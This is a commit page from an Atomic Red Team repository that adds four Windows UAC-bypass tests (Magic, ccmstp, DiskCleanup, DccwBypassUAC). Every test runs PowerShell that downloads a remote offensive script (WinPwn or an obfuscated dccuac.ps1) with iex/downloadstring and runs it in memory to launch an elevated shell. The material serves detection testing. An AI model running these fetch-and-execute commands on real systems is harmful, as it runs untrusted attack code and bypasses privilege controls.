security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

WinPwn Bypass UAC (#1941)

Browse Source 
Co-authored-by: Toua Lor <tlor@nti.local>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
tlor89
2022-05-11 19:45:03 -05:00
committed by GitHub
parent a9530210e6
commit ff1f81472c
1 changed files with 38 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1548.002/T1548.002.yaml
+38
View File
@@ -556,3 +556,41 @@ atomic_tests:
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
name: command_prompt
- name: WinPwn - UAC Magic
description: UAC bypass using Magic technique via function of WinPwn
supported_platforms:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique magic
name: powershell
- name: WinPwn - UAC Bypass ccmstp technique
description: UAC bypass using ccmstp technique via function of WinPwn
supported_platforms:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
UACBypass -noninteractive -command "C:\windows\system32\calc.exe" -technique ccmstp
name: powershell
- name: WinPwn - UAC Bypass DiskCleanup technique
description: UAC bypass using DiskCleanup technique via function of WinPwn
supported_platforms:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique DiskCleanup
name: powershell
- name: WinPwn - UAC Bypass DccwBypassUAC technique
description: UAC Bypass DccwBypassUAC technique via function of WinPwn
supported_platforms:
- windows
executor:
command: |-
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/dccuac.ps1')
name: powershell